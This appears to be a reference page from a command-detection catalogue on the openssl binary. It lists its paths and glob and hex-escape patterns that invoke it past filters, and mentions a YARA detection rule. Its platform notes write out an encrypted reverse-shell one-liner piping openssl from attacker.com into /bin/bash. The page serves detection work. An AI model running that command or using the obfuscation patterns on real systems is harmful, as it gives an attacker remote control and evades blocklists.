openssl
Cryptography toolkit and TLS client. Can encrypt/decrypt data, create reverse shells over TLS, and act as a generic TCP client.
Binary Paths
/usr/bin/openssl/bin/openssl
Glob Patterns
| Pattern | Notes |
|---|---|
open*
|
Star matches 'ssl' — may match other 'open*' binaries in PATH |
openss?
|
Single wildcard replaces 'l' |
ope?ssl
|
Wildcard replaces 'n' |
o*ssl
|
Star matches 'pen' |
/usr/bin/openss?
|
Full path, wildcard on last char |
/???/bin/open*
|
Mixed wildcards on path and command |
$(ls /usr/bin/openss?)
|
ls resolves glob to /usr/bin/openssl; command substitution executes it |
$'\x6f\x70\x65\x6e\x73\x73\x6c'
|
ANSI-C hex escapes expand to 'openssl' |
Pattern Tester
$
Try typing openssl or a full path like /usr/bin/openssl
YARA Rule
Auto-generated detection rule for openssl
Platform Notes
openssl can create encrypted reverse shells: openssl s_client -connect attacker.com:443 | /bin/bash 2>&1 | openssl s_client -connect attacker.com:444. The enc subcommand handles symmetric encryption. The s_client subcommand acts as a TLS-capable netcat.